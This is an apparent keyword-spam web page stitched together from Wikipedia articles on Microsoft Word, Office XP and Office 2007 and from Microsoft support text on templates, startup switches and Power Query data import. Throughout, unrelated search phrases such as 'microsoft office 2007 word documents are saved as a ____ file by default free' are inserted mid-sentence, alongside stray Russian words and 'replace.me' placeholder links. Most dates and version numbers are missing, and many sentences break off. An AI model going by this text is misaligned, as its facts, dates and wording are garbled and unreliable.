This work was started in response to government requests for interoperability with ODF. The goal of project was not to add ODF support to Microsoft Office, but only to create a plugin and an external tool-set.

Among its features, Word includes a built-in spell checker, a thesaurus, a dictionary, and utilities for manipulating and editing text.

The following are some aspects of its feature set. Several later versions of Word include the ability for users to create their formatting templates, allowing them to define a file in which: the title, heading, paragraph, and other element designs differ from the standard Word templates. For example, Normal.

It determines the margin defaults as well as the layout of the text and font defaults. Although Normal. This will change other documents which were created using the template. It can also be used to create and display simple line art. Microsoft Word added support [81] for the common SVG vector image format in for Office ProPlus subscribers and this functionality was also included in the Office release.

WordArt enables drawing text in a Microsoft Word document such as a title, watermark, or other text, with graphical effects such as skewing, shadowing, rotating, stretching in a variety of shapes and colors, and even including three-dimensional effects. Users can apply formatting effects such as shadow, bevel, glow, and reflection to their document text as easily as applying bold or underline.

Users can also spell-check text that uses visual effects and add text effects to paragraph styles. A Macro is a rule of pattern that specifies how a certain input sequence often a sequence of characters should be mapped to an output sequence according to a defined process. Frequently used or repetitive sequences of keystrokes and mouse movements can be automated.

Like other Microsoft Office documents, Word files can include advanced macros and even embedded programs. This extensive functionality can also be used to run and propagate viruses in documents. The tendency for people to exchange Word documents via email, USB flash drives , and floppy disks made this an especially attractive vector in A prominent example was the Melissa virus , but countless others have existed.

These macro viruses were the only known cross-platform threats between Windows and Macintosh computers and they were the only infection vectors to affect any macOS system up until the advent of video codec trojans in Word’s macro security setting, which regulates when macros may execute, can be adjusted by the user, but in the most recent versions of Word, it is set to HIGH by default, generally reducing the risk from macro-based viruses, which have become uncommon.

Before Word Word 14 for Windows, the program was unable to correctly handle ligatures defined in OpenType fonts. Since Word , the program now has advanced typesetting features which can be enabled, [83] OpenType ligatures, [84] kerning and hyphenation previous versions already had the latter two features. Other layout deficiencies of Word include the inability to set crop marks or thin spaces.

Various third-party workaround utilities have been developed. In Word for Mac OS X, support of complex scripts was inferior even to Word 97 [86] and Word did not support Apple Advanced Typography features like ligatures or glyph variants.

Microsoft word is only awkwardly suitable for some kinds of technical writing, specifically, that which requires: mathematical equations , figure placement, table placement and cross-references to any of these items.

The usual workaround for equations is to use a third-party equation typesetter. Figures and tables must be placed manually; there is an anchor mechanism but it is not designed for fully automatic figure placement and editing text after placing figures and tables often requires re-placing those items by moving the anchor point and even then the placement options are limited.

This problem is deeply baked into Word’s structure since as it does not know where page breaks will occur until the document is printed. Microsoft Word supports bullet lists and numbered lists. It also features a numbering system that helps add correct numbers to pages, chapters, headers, footnotes, and entries of tables of content; these numbers automatically change to correct ones as new items are added or existing items are deleted. Bullets and numbering can be applied directly to paragraphs and converted to lists.

In particular, a second irrelevant numbered list might have not started with number one but instead resumed numbering after the last numbered list. Although Word 97 supported a hidden marker that said the list numbering must restart afterward, the command to insert this marker Restart Numbering command was only added in Word However, if one were to cut the first item of the listed and paste it as another item e. Users can also create tables in Word. Depending on the version, Word can perform simple calculations — along with support for formulas and equations as well.

Word continues to default to non-Unicode characters and non-hierarchical bulleting, despite user preference for Powerpoint-style symbol hierarchies e.

Microsoft Office XP codenamed Office 10 [7] is an office suite which was officially revealed in July by Microsoft for the Windows operating system. Office XP was released to manufacturing on March 5,[8] and was later made available to retail on May 31,less than five months prior вот adobe audition free full version for windows 10 того the release of Windows XP. X was released on November 19, New features in Office XP include smart tagsa selection-based search feature that recognizes different types of text in a document so that users can perform additional actions; a task pane interface that consolidates popular menu bar commands on the right side of the screen to facilitate quick access to them; new document collaboration capabilities, support for MSN Groups and SharePoint ; and integrated handwriting recognition and speech recognition capabilities.

With Office XP, Microsoft incorporated several features to address reliability issues observed in previous versions of Office. Office XP is incompatible with Windows 95 and earlier versions of Windows.

Office XP received mostly positive reviews upon its release, with critics praising its http://replace.me/24246.txt features, document protection and recovery functionality, and smart tags; however, the suite’s handwriting recognition and speech recognition capabilities were criticized and were mostly viewed as inferior to similar offerings from competitors.

As of Mayover 60 million Office XP licenses had been sold. Microsoft released three service packs for Office XP during its lifetime. At a meeting with financial analysts in JulyMicrosoft demonstrated Office XP, then known by its codename, Office 10, which included a subset of features Microsoft designed in accordance with what at the time was known as the. NET strategyone by which it intended to provide extensive client access to various web services and features such as speech recognition.

Before the release of Office 10 Beta 2, there was speculation that Microsoft intended to rebrand the new product as “Office ,” [22] “Office building a business website dummies free [22] “Office. NET” but unnamed sources stated that the company did not desire to do the same with Office 10, as the product was only partially related to the microsoft office themes 2013 download. NET strategy.

Office XP Beta 2 was released to 10, technical testers in late The Custom Maintenance Wizard, for example, now allowed setup components to be modified after their installation, and the setup process of Office XP itself used a new version of Windows Installer. Microsoft also terminated the product’s support for Windows 95 and Windows NT 4. Office XP was released to manufacturing on March 5,[8] and was later made available to retail on May 31, Microsoft released three service packs for Office XP throughout the product’s lifecycle that introduced security enhancements, stability improvements, and software bug fixes; each service pack was made available as separate Client and Full File update versions.

Full File updates did not require access to installation media and were intended for network administrators to deploy updates to Office XP users who installed the product from a server location; [31] [32] [33] users could also manually install Full File updates.

Service Pack 1 SP1 was released on December 11,and included performance and security improvements, as well as stability improvements based on error reports from users. Service Pack 2 SP2released on August 21, included all previously available standalone updates; some of the those previously released included cumulative security patches for Excel and Word to address potentially malicious code embedded in document macros.

Earlier updates were designed to update only administrative images and fail when applied directly to clients. Service Pack 3 SP3 microsoft office 2007 word documents are saved as a ____ file by default free released on March 30,and included all previously released updates, as well as previously unreleased stability improvements based on feedback and error reports received from users. SP3 does not require any earlier service packs to be installed. Office XP has a streamlined, flatter appearance compared to previous versions of Office.

According to Microsoft, this change involved “removing visually competing microsoft office 2007 word documents are saved as a ____ file by default free, visually prioritizing items on продолжить page, increasing letter spacing and word spacing for better readability, and defining foreground and background color to bring the most important elements to the front.

Excel and Word introduce smart tagscommands for specific types of text including addressescalendar datespersonal namestelephone numbersticker symbolsor tracking numbers in documents. Excel and Word support extensible smart tags that allow developers and organizations to display custom commands related to specific information. The smart tags used by Word are also available in Outlook if the former is configured as the default e-mail editor.

The AutoCorrect and Paste Options commands in previous versions of Office have been updated microsoft office 2007 word documents are saved as a ____ file by default free include smart tags that are shared among all Office XP programs. The AutoCorrect smart tag provides individual options to revert an automatic correction or to prohibit an automatic correction from occurring in the future, and also provides access to the AutoCorrect Options dialog box.

After the release of Office XP, Microsoft provided a repository for downloadable smart tags on its website. Office XP introduces a task pane interface that consolidates popular menu bar commands on the right side of the screen to facilitate quick access to them.

Wordfor example, includes a task pane dedicated to style and formatting options. Users can switch between open task panes through the use of back смотрите подробнее forward buttons; a drop-down list also presents specific task panes to which users can switch. The default Startup task pane is automatically available when users launch an Office XP program and presents individual commands to open an existing file, create a new blank file or one from a templateadd a network location, or open Office Help.

The Search task pane includes individual Basic and Advanced modes and allows users to query local or remote locations for files. The Basic mode allows users to perform full-text searcheswhile the Advanced mode provides additional file property query options.

The Office Clipboard has been redesigned as the Clipboard task pane across all Office XP programs and can accommodate up to 24 clipboard items compared to 12 in Office Clipboard items provide a visual representation to help users distinguish different types of content. Access and Excel support exporting and importing XML. Users can also save Excel workbooks as XML spreadsheets. Office XP introduces handwriting recognition in all Office programs, allowing users to write with a mouse or stylus instead of entering text by typing on a keyboard.

Once installed, handwriting functionality is also available in Internet Explorer 5 and Outlook Express 5 or later.

The downloadable Tablet Pack for Office XP provided an extension for Windows Journal to reuse notes as Outlook items and to import meeting information from Outlook into notes. Speech recognition based on Microsoft Research technology is available for all Office XP programs, allowing users to dictate text into active documents, to change document formatting, and to navigate the interface by voice.

The speech recognition feature encompasses two different modes: Dictation, which transcribes spoken words into text; and Voice Command, which invokes interface features.

Speech recognition can be installed during Office XP setup microsoft office 2007 word documents are saved as a ____ file by default free by clicking the Speech option in the Tools menu in Word When installed, it is available as a Microphone command on the Language toolbar that appears in the upper-right corner of the screen lower-right corner in East-Asian versions of Office XP.

When launched for the first time, speech recognition offers a tutorial to improve recognition accuracy, which begins by providing instructions to adjust the microphone for microsoft office 2007 word documents are saved as a ____ file by default free performance.

Users can configure speech recognition settings, including pronunciation sensitivity in voice command mode, accuracy and recognition response time in dictation mode, and microphone settings through the Speech control panel applet.

The Regional and Language Options applet provides Language toolbar and additional settings. With Office XP, Microsoft incorporated several features to address reliability issues observed in previous versions of Office:. Additionally, all Office XP programs provide options for users to digitally sign documents.

When upgrading from a previous version of Office, Office XP retains the user’s previous configuration. The Custom Installation Wizard can prohibit the installation, use, or uninstallation of programs microsoft office 2007 word documents are saved as a ____ file by default free features such as the Run from Network and Installed on First Use setup options.

Finally, the Custom Maintenance Wizard has been updated to provide customization options to configure Office XP including user preferences and security settings. In an effort to curtail software piracyMicrosoft incorporated product activation technology into all versions of Office XP to prohibit users from installing a single copy of the software in a manner that violates the end-user license agreement EULA. The EULA allows a single user to install one copy each on a primary device and a portable device such as a laptop.

Users who make substantial hardware changes to an Office XP device may need to reactivate the software through the Internet or by telephone. Product activation does not require personally identifiable information.

Office XP introduced an optional subscription-based activation model that allowed consumers to annually license the product and receive incremental updates at a reduced price when compared with the cost of a full retail version.

Microsoft originally intended to deliver the activation model to United States customers after the retail availability of Office XP on May 31,but later decided to make it available to consumers in “a few select locations” instead, citing a more cautious delivery approach. A new “Ask a Question” feature appears in the top-right corner of all Office XP programs and allows users to type natural language questions and receive answers without opening the Office Assistant “Clippy” or Office Help.

Additionally, Office Help has been updated to aggregate and display content from the Internet in response to a query. The Office Assistant is now disabled by default and only appears when Help is activated. The component products were packaged together in various suites.

Some of these editions were available as retail packages in either full or upgrade versions, others as full OEM versions for inclusion with new PCs, and still others as volume license versions that required no activation.

All editions provided the core components of Word, Excel, and Outlook, and all editions except the Small Business edition provided PowerPoint. Microsoft Office XP received mixed to positive reviews after its release. CNET praised microsoft office 2007 word documents are saved as a ____ file by default free new collaboration and data recovery features, and stated that Office XP offered a “host of incremental improvements” over its predecessor, Officebut ultimately concluded that “most enhancements and additions are better suited for groups than individuals.

While most assessments of Office XP were positive, the speech recognition feature was frequently criticized due to its inaccuracy and lack of advanced functionality. CNET regarded it as “especially lame” because of its inability microsoft office 2007 word documents are saved as a ____ file by default free recognize text editing commands such as “select the sentence” and because it required users to manually switch between command and dictation modes.

From Wikipedia, the free encyclopedia. Version of Microsoft Office suite. These applications make up the Standard edition. Windows NT 4.

List of languages. Main article: Smart tag Microsoft. На этой странице Pentium III. Hardware accelerated video card or MMX processor. An audio output device and microphone are required for speech recognition.

Collaboration features require Office 97 or later Internet access microsoft office 2007 word documents are saved as a ____ file by default free required for product activation and online functionality. Touchscreen for handwriting functionality. News Center. May 31, Retrieved February 25, Download Center. March 30, Archived from the original on January 5, Office Support. May 30, Archived from the original on December 1, Archived from the original on March 7, Retrieved April 9, August 6, Archived from the original on April 14, Retrieved February 26,

Using a command-line switch doesn’t mean you have to type the whole startup command at the command prompt. You can start the Office app as usual, by clicking the program icon on the desktop, or by clicking the program name on the Start menu. All startup methods essentially do the same thing: they run the app’replace.me file, even if you don’t actually type the command or . Sep 30,  · This is the default file format of Microsoft Works, versions through xml: Word XML Document: The XML format supported in Office Word xml: Word XML Document: The XML file format supported in Word , Word , Word , Word , and Office Word (Open XML)replace.me: XPS Document. The project released version for Microsoft Word of this software in January followed by versions for Microsoft Excel and Microsoft PowerPoint in December of the same year. Sun Microsystems has created the competing OpenDocument plugin for Microsoft Office (Service Pack 1 or higher), , XP, and that supports Word, Excel.

The changed path is noted in the Windows registry. The path is used the next time that you want to save a new template. For more information, see the “Changes in the Windows registry settings for the user templates file location and for the workgroup templates file location” section.

Your network administrator can change the location in which your new templates are saved by using the policy templates that are included with the Microsoft Office Resource Kit. For more information, contact your network administrator.

You can also create custom tabs that appear in the Templates dialog box by creating a new folder in the Templates folder in your profile.

Tabs that have the same name as a new folder appear in the Templates dialog box. These tabs let you categorize your new templates even more. The template options are available when you click the Microsoft Office Button , and then click New in Office , or from New under the File menu in Office Microsoft Office Publisher and Microsoft Office SharePoint Designer do not use the same user interface as the previously listed Office programs.

The templates that are saved in this location are basically the same as the templates that are saved in your user templates file location. However, the location is typically a shared folder on a network drive. Your network administrator may set a shared location as a source from which to provide templates that are used throughout your workgroup or company. The workgroup template file location typically is a read-only shared folder. In addition to looking in your default user templates file location for existing templates, and Office programs look in the workgroup templates file location for more templates.

For more information about the workgroup templates file location and about how to share a template with your workgroup or your company, contact your network administrator.

Advertised templates are the templates that are included with Office programs. These templates appear in the Templates dialog box. Depending on the type of Office installation, you may not have all the templates installed on the computer. Thank you! Any more feedback? The more you tell us the more we can help. Can you help us improve?

Resolved my issue. Clear instructions. Easy to follow. No jargon. Pictures helped. Didn’t match my screen. Incorrect instructions. Too technical. Not enough information. Not enough pictures. Any additional feedback? Submit feedback. Thank you for your feedback! Starts Word with a new document based on a template other than the Normal template.

Starts Word and opens an existing file. Starts Word with a new document based on an existing file. Starts Word and then loads a specific Word add-in. Opens a specific workbook as read-only. Starts Excel and opens the specified file as a template. Prevents the Excel startup screen from appearing and a new blank workbook from opening. Creates a new workbook that contains a single XLM macro sheet.

Starts Excel and loads the Automation add-in that is specified by the progID of the add-in. Starts a new instance a separate process of Excel. Starts PowerPoint with a new blank presentation. Runs a macro in a specified presentation. Starts PowerPoint and creates a new presentation. Starts PowerPoint and specifies a list of files to open. Prints the presentation to the default printer by using default settings. Prints the presentation to the specified printer by using the default settings.

Prints the specified file, but show the Print dialog box. Opens the specified presentation file as a slide show. Shows the Open dialog box when the presentation ends. Reads a playlist of PowerPoint presentations contained within a text file. Opens the presentation at a specified slide number, instead of slide 1. Starts the viewer without showing the splash screen. Sends the presentation to a printer, and print the file. Creates an item with the specified file as an attachment. Prompts for the default manager of e-mail, news, and contacts.

Removes all names and e-mail addresses from the Auto-Complete list. Deletes the logging records saved when a manager or a delegate declines a meeting. Resets all Search Folders in the Microsoft Exchange mailbox for only the first profile opened.

Removes all manually added From entries from the profile. Removes all MailTips from the cache. Starts Outlook and deletes client-based and server-based rules. Deletes the subscription messages and properties for subscription features. Restores default views. Used without command-line parameters for standard OLE co-create.

Opens the specified message file. Opens a Help window with the Help topic specified in assetid displayed. When you merge two external data sources, you join two queries that create a relationship between two tables. When you append two or more queries, the data is added to a query based on the names of the column headers in both tables.

The queries are appended in the order in which they’re selected. For more information, see Append queries Power Query. You can use the Power Query add-in to connect to external data sources and perform advanced data analyses.

The following sections provide steps for connecting to your data sources – web pages, text files, databases, online services, and Excel files, tables, and ranges.

Click the Power Query check box, then OK. The Power Query ribbon should appear automatically, but if it doesn’t, close and restart Excel. The following video shows the Query Editor window appearing after editing a query from an Excel workbook. The following video shows one way to display the Query Editor. These automatic actions are equivalent to manually promoting a row and manually changing each column type.

For example:. The following video shows the Query Editor window in Excel appearing after editing a query from an Excel workbook. If prompted, in the From Table dialog box, you can click the Range Selection button to select a specific range to use as a data source. If the range of data has column headers, you can check My table has headers. The range header cells are used to set the column names for the query.

Note: If your data range has been defined as a named range, or is in an Excel table, then Power Query will automatically sense the entire range and load it into the Query Editor for you. Plain data will automatically be converted to a table when it is loaded into the Query Editor. You can use the Query Editor to write formulas for Power Query. You can also use the Query Editor to write formulas for Power Query.

Note: While trying to import data from a legacy Excel file or an Access database in certain setups, you may encounter an error that the Microsoft Access Database Engine Microsoft. The error occurs on systems with only Office installed. To resolve this error, download the following resources to ensure that you can proceed with the data sources you are trying to access. Microsoft Access Database Engine Redistributable. Access Database Engine Service Pack 1. In the Access Web dialog box, click a credentials option, and provide authentication values.

Power Query will analyze the web page, and load the Navigator pane in Table View. If you know which table you want to connect to, then click it from the list. For this example, we chose the Results table. Otherwise, you can switch to the Web View and pick the appropriate table manually. In this case, we’ve selected the Results table. Click Load , and Power Query will load the web data you selected into Excel.

Windows : This is the default selection. In the next dialog box, select from Default or Custom , Windows , or Database connection options, enter your credentials, then press Connect. In the Navigator pane, select the tables or queries that you want to connect to, then press Load or Edit. In the Browse dialog box, browse for or type a file URL to import or link to a file. Follow the steps in the Navigator dialog to connect to the table or query of your choice.

After the connection succeeds, you will be able to use the Navigator pane to browse and preview the collections of items in the XML file in a tabular form. Save Data Connection File and Finish. In the Select the database that contains the data you want pane, select a database, then click Next. To connect to a specific cube in the database, make sure that Connect to a specific cube or table is selected, and then select a cube from the list. In the Import Data dialog box, under Select how you want to view this data in your workbook , do one of the following:.

To store the selected connection in the workbook for later use, click Only Create Connection. This check box ensures that the connection is used by formulas that contain Cube functions that you create and that you don’t want to create a PivotTable report. To place the PivotTable report in an existing worksheet, select Existing worksheet , and then type the cell reference of the first cell in the range of cells where you want to locate the PivotTable report.

You can also click Collapse Dialog to temporarily hide the dialog box, select the beginning cell on the worksheet that you want to use, and then press Expand Dialog. To place the PivotTable report in a new worksheet starting at cell A1, click New worksheet.

To verify or change connection properties, click Properties , make the necessary changes in the Connection Properties dialog box, and then click OK. You can either use Power Query or the Data Connection wizard. In the Access SharePoint dialog box that appears next, select a credentials option:.

In the Navigator dialog, select the Database and tables or queries you want to connect to, then press Load or Edit. In the Active Directory Domain dialog box for your domain, click Use my current credentials , or Use alternate credentials. For Use alternate credentials authentication, enter your Username and Password.

After the connection succeeds, you can use the Navigator pane to browse all the domains available within your Active Directory, and drill down into Active Directory information including Users, Accounts, and Computers.

See: Which version of Office am I using? If you aren’t signed in using the Microsoft Work or School account you use to access CDS for Apps, click Sign in and enter the account username and password. If the data is good to be imported as is, then select the Load option, otherwise choose the Edit option to open the Power Query Editor. Note: The Power Query Editor gives you multiple options to modify the data returned.

For instance, you might want to import fewer columns than your source data contains. Note: If you need to retrieve your storage access key, browse to the Microsoft Azure Portal , select your storage account, and then click on the Manage Access Key icon on the bottom of the page. Click on the copy icon to the right of the primary key, and then paste the value in the Account Key box. Note: If you need to retrieve your key, return to the Microsoft Azure Portal , select your storage account, and click on the Manage Access Key icon on the bottom of the page.

Click on the copy icon to the right of the primary key and paste the value into the wizard. Click Load to load the selected table, or click Edit to perform additional data filters and transformations before loading it. The following sections provide steps for using Power Query to connect to your data sources – web pages, text files, databases, online services, and Excel files, tables, and ranges. Make sure you have downloaded, installed, and activated the Power Query Add-In. For Use alternate credenitals authentication, enter your Username and Password.

Power Query is not available in Excel However, you can still connect to external data sources. Step 1: Create a connection with another workbook. Near the bottom of the Existing Connections dialog box, click Browse for More. In the Select Table dialog box, select a table worksheet , and click OK.

You can rename a table by clicking on the Properties button. You can also add a description. Click Existing Connections , choose the table, and click Open. In the Import Data dialog box, choose where to put the data in your workbook and whether to view the data as a Table , PivotTable , or PivotChart. In the Select Data Source dialog box, browse to the Access database. In the Select Table dialog box, select the tables or queries you want to use, and click OK.

You can click Finish , or click Next to change details for the connection. In the Import Data dialog box, choose where to put the data in your workbook and whether to view the data as a table, PivotTable report, or PivotChart.

Click the Properties button to set advanced properties for the connection, such as options for refreshing the connected data. Optionally, you can add the data to the Data Model so that you can combine your data with other tables or data from other sources, create relationships between tables, and do much more than you can with a basic PivotTable report. Then, in the Import Text File dialog box, double-click the text file that you want to import, and the Text Import Wizard dialog will open.

Original data type If items in the text file are separated by tabs, colons, semicolons, spaces, or other characters, select Delimited. If all of the items in each column are the same length, select Fixed width. Start import at row Type or select a row number to specify the first row of the data that you want to import. File origin Select the character set that is used in the text file.

In most cases, you can leave this setting at its default. If you know that the text file was created by using a different character set than the character set that you are using on your computer, you should change this setting to match that character set. For example, if your computer is set to use character set Cyrillic, Windows , but you know that the file was produced by using character set Western European, Windows , you should set File Origin to Preview of file This box displays the text as it will appear when it is separated into columns on the worksheet.

Delimiters Select the character that separates values in your text file. If the character is not listed, select the Other check box, and then type the character in the box that contains the cursor.

These options are not available if your data type is Fixed width. Treat consecutive delimiters as one Select this check box if your data contains a delimiter of more than one character between data fields or if your data contains multiple custom delimiters.

Text qualifier Select the character that encloses values in your text file. When Excel encounters the text qualifier character, all of the text that follows that character and precedes the next occurrence of that character is imported as one value, even if the text contains a delimiter character.

For example, if the delimiter is a comma , and the text qualifier is a quotation mark ” , “Dallas, Texas” is imported into one cell as Dallas, Texas. If no character or the apostrophe ‘ is specified as the text qualifier, “Dallas, Texas” is imported into two adjacent cells as “Dallas and Texas”. If the delimiter character occurs between text qualifiers, Excel omits the qualifiers in the imported value.

If no delimiter character occurs between text qualifiers, Excel includes the qualifier character in the imported value. Hence, “Dallas Texas” using the quotation mark text qualifier is imported into one cell as “Dallas Texas”. Data preview Review the text in this box to verify that the text will be separated into columns on the worksheet as you want it. Data preview Set field widths in this section.

Click the preview window to set a column break, which is represented by a vertical line. Double-click a column break to remove it, or drag a column break to move it. Specify the type of decimal and thousands separators that are used in the text file. When the data is imported into Excel, the separators will match those that are specified for your location in Regional and Language Options or Regional Settings Windows Control Panel.

Column data format Click the data format of the column that is selected in the Data preview section. If you do not want to import the selected column, click Do not import column skip. After you select a data format option for the selected column, the column heading under Data preview displays the format.

If you select Date , select a date format in the Date box. Choose the data format that closely matches the preview data so that Excel can convert the imported data correctly. To convert a column of all currency number characters to the Excel Currency format, select General. To convert a column of all number characters to the Excel Text format, select Text. To convert a column of all date characters, each date in the order of year, month, and day, to the Excel Date format, select Date , and then select the date type of YMD in the Date box.

Excel will import the column as General if the conversion could yield unintended results. Document compatibility reached parity with Office 97 and Word on the Mac became a viable business alternative to its Windows counterpart. Unfortunately, Word on the Mac in this and later releases also became vulnerable to future macro viruses that could compromise Word and Excel documents, leading to the only situation where viruses could be cross-platform.

It was then released in the same period as well. Word was bundled with the Macintosh Office for that platform, acquiring most, if not all, of the feature set of Word Released in October , Word was also sold as an individual product. Word was bundled with Office XP and was released in It had many of the same features as Word , but had a major new feature called the ‘Task Panes’, which gave quicker information and control to a lot of features that were before only available in modal dialog boxes.

One of the key advertising strategies for the software was the removal of the Office Assistant in favor of a new help system, although it was simply disabled by default.

Microsoft Office is an office suite developed and distributed by Microsoft for its Windows operating system. Office was released to manufacturing on August 19, , and was later released to retail on October 21, It was the successor to Office XP and the predecessor to Office A new Macintosh version of Office was released in May Substantial cleanup of the various applications Word, Excel, PowerPoint and feature parity with Office for Microsoft Windows created a very usable release.

Microsoft released patches through the years to eliminate most known macro vulnerabilities from this version. While Apple released Pages and the open source community created NeoOffice, Word remains the most widely used word processor on the Macintosh.

It is equivalent to Office for Windows. Also: Stable release: v The release includes numerous changes, including a new XML-based file format, a redesigned interface, an integrated equation editor and bibliographic management. Additionally, an XML data bag was introduced, accessible via the object model and file format, called Custom XML — this can be used in conjunction with a new feature called Content Controls to implement structured documents.

It also has contextual tabs, which are functionality specific only to the object with focus, and many other features like Live Preview which enables you to view the document without making any permanent changes , Mini Toolbar, Super-tooltips, Quick Access toolbar, SmartArt, etc. Word uses a new file format called docx. Word — users on Windows systems can install a free add-on called the “Microsoft Office Compatibility Pack” to be able to open, edit, and save the new Word files.

Word was released on January 15, It includes some new features from Word , such as a ribbon-like feature that can be used to select page layouts and insert custom diagrams and images. Word also features native support for the new Office Open XML format, although the old doc format can be set as a default.

Office was released to manufacturing on April 15, , and was later made available for retail and online purchase on June 15, It is the successor to Office and the predecessor to Office The release of Word has brought Word a cleaner look and this version focuses further on Cloud Computing with documents being saved automatically to OneDrive previously Skydrive.

If enabled, documents and settings roam with the user. Other notable features are a new read mode which allows for horizontal scrolling of pages in columns, a bookmark to find where the user left off reading their document and opening PDF documents in Word just like Word content.


Manage Office programs templates – Office | Microsoft Docs.File format reference for Word, Excel, and PowerPoint

Using a command-line switch doesn’t mean you have to type the whole startup command at the command prompt. You can start the Office app as usual, by clicking the program icon on the desktop, or by clicking the program name on the Start menu. All startup methods essentially do the same thing: they run the app’replace.me file, even if you don’t actually type the command or . Microsoft Office (codenamed Office 12) is an office suite for Windows, developed and published by replace.me was officially revealed on March 9, and was the 12th version of Microsoft replace.me was released to manufacturing on November 3, ; it was subsequently made available to volume license customers on November 30, , and later to retail on . The replace.me extension signifies the Office Open XML international standard for Office documents and is used by default by Word and later for Windows as well format became a de facto standard of document file formats for Microsoft Office web is a free lightweight version of Microsoft Word available as part of Office on the web. By default, the Encrypt connection check box is selected to signify that Power Query connects to your database using an encrypted connection. If you do not want to connect using an encrypted connection, clear this check box, and then click Connect.. If a connection to your SQL Server is not established using an encrypted connection, Power Query prompts you to connect using an .

Microsoft Office codenamed Office 12 [5] is an office suite for Windows , developed and published by Microsoft. It was officially revealed on March 9, and was the 12th version of Microsoft Office. It was released to manufacturing on November 3, ; [6] it was subsequently made available to volume license customers on November 30, , [7] [8] and later to retail on January 30, , [1] shortly after the completion of Windows Vista.

The ninth major release of Office for Windows, Office was preceded by Office and succeeded by Office Office introduced a new graphical user interface called the Fluent User Interface , which uses ribbons and an Office menu instead of menu bars and toolbars.

The new formats are intended to facilitate the sharing of information between programs, improve security, reduce the size of documents, and enable new recovery scenarios. Office is incompatible with Windows and earlier versions of Windows.

Office includes new applications and server-side tools, including Microsoft Office Groove , a collaboration and communication suite for smaller businesses, which was originally developed by Groove Networks before being acquired by Microsoft in Also included is SharePoint Server , a major revision to the server platform for Office applications, which supports Excel Services , a client-server architecture for supporting Excel workbooks that are shared in real time between multiple machines, and are also viewable and editable through a web page.

Its designer-oriented counterpart, Microsoft Expression Web , is targeted for general web development. However, neither application has been included in Office software suites. Speech recognition functionality has been removed from the individual programs in the Office suite, as Windows Speech Recognition was integrated into Windows Vista.

Windows XP users must install a previous version of Office to use speech recognition features. Mainstream support for Office ended on October 9, , and extended support ended on October 10, It included an updated user interface, better accessibility support, improvements in the robustness of the platform, and greater functionality. Office was released to volume licensing customers on November 30, , and to the general public on January 30, Since the initial release of Microsoft Office , three service packs containing updates as well as additional features have been released.

Microsoft Office Service Packs are cumulative, so previous Service Packs are not a prerequisite for installation. Microsoft Office Service Pack 1 was released on December 11, Eligible employees of companies with volume license agreements for Microsoft Office receive additional tools, including enterprise content management , electronic forms, Information Rights Management capabilities and copies for use on a home computer.

The new user interface UI , officially known as Fluent User Interface , [28] [29] has been implemented in the core Microsoft Office applications: Word , Excel , PowerPoint , Access , and in the item inspector used to create or edit individual items in Outlook. These applications have been selected for the UI overhaul because they center around document authoring. The Office button, located on the top-left of the window, replaces the File menu and provides access to functionality common across all Office applications, including opening, saving, printing, and sharing a file.

It can also close the application. Users can also choose color schemes for the interface. A notable accessibility improvement is that the Office button follows Fitts’s law. The ribbon , a panel that houses a fixed arrangement of command buttons and icons, organizes commands as a set of tabs , each grouping relevant commands. The ribbon is not user customizable in Office Each application has a different set of tabs that exposes functions that the application offers.

For example, while Excel has a tab for the graphing capabilities, Word does not; instead it has tabs to control the formatting of a text document. Within each tab, various related options may be grouped together. The ribbon is designed to make the features of the application more discoverable and accessible with fewer mouse clicks [34] as compared to the menu-based UI used prior to Office Moving the mouse scroll wheel while on any of the tabs on the ribbon cycles—through the tabs.

The ribbon can be minimized by double clicking the active section’s title, such as the Home text in the picture below. Third party add-ins, however, can bring menus and toolbars back to Office or customize the ribbon commands. Some tabs, called Contextual Tabs , appear only when certain objects are selected. Contextual Tabs expose functionality specific only to the object with focus.

For example, selecting a picture brings up the Pictures tab, which presents options for dealing with the picture. Similarly, focusing on a table exposes table-related options in a specific tab. Contextual Tabs remain hidden except when an applicable object is selected.

Microsoft Office also introduces a feature called Live Preview , which temporarily applies formatting on the focused text or object when any formatting button is moused-over. The temporary formatting is removed when the mouse pointer is moved from the button. This allows users to have a preview of how the option would affect the appearance of the object, without actually applying it.

The new Mini Toolbar is a small toolbar with basic formatting commands that appears within the document editing area, much like a context menu. When the mouse selects part of the text, Mini Toolbar appears close to selected text. It remains semi-transparent until the mouse pointer is hovered on it, to avoid obstructing what is underneath.

Mini Toolbar is not customizable in Office , but can be turned off. It is customizable, although this feature is limited, compared to toolbars in previous Office versions. Any command available in the entire Office application can be added to the Quick Access toolbar , including commands not available on the ribbon as well as macros.

Keyboard shortcuts for any of the commands on the toolbar are also fully customizable, similar to previous Office versions. SmartArt, found under the Insert tab in the ribbon in PowerPoint, Word, Excel, and Outlook, is a new group of editable and formatted diagrams.

There are preset SmartArt graphics layout templates in categories such as list, process, cycle, and hierarchy. When an instance of a SmartArt is inserted, a Text Pane appears next to it to guide the user through entering text in the hierarchical levels. Each SmartArt graphic, based on its design, maps the text outline, automatically resized for best fit, onto the graphic.

There are a number of “quick styles” for each graphic that apply largely different 3D effects to the graphic, and the graphic’s shapes and text can be formatted through shape styles and WordArt styles. In addition, SmartArt graphics change their colors, fonts, and effects to match the document’s theme. Such files are saved using an extra X letter in their extension.

However, it can still save documents in the old format, which is compatible with previous versions. Alternatively, Microsoft has made available a free add-on known as the Microsoft Office Compatibility Pack that lets Office , XP, and open, edit, and save documents created under the newer format. Files containing macros are saved with an extra M letter in their extension instead. However, due to legal objections from Adobe Systems , Office originally did not offer PDF support out of the box, but rather as a separate free download.

Office documents can also be exported as XPS documents. This is part of Service Pack 2 and prior to that, was available as a free plug-in in a separate download. Microsoft backs an open-source effort to support OpenDocument in Office , as well as earlier versions up to Office , through a converter add-in for Word, Excel and PowerPoint, and also a command-line utility.

Section 8. Peter Amstein and the Microsoft Office team are reluctant to make liberal use of extension mechanisms, even though provided in ODF 1.

They want to avoid all appearance of an embrace-extend attempt. In Office , Microsoft introduced the Document Inspector , an integral metadata removal tool that strips Word, Excel, and PowerPoint documents of information such as author name and comments and other “metadata”.

In Microsoft Office , the Office Assistants were eliminated in favour of a new online help system. One of its features is the extensive use of Super Tooltips, which explain in about one paragraph what each function performs. Some of them also use diagrams or pictures. These appear and disappear like normal tooltips, and replace normal tooltips in many areas.

The Help content also directly integrates searching and viewing Office Online articles. Microsoft Office includes features geared towards collaboration and data sharing. As such, Microsoft Office features server components for applications such as Excel, which work in conjunction with SharePoint Services , to provide a collaboration platform. NET 2. Excel server exposes Excel Services, which allows any worksheet to be created, edited and maintained via web browsers.

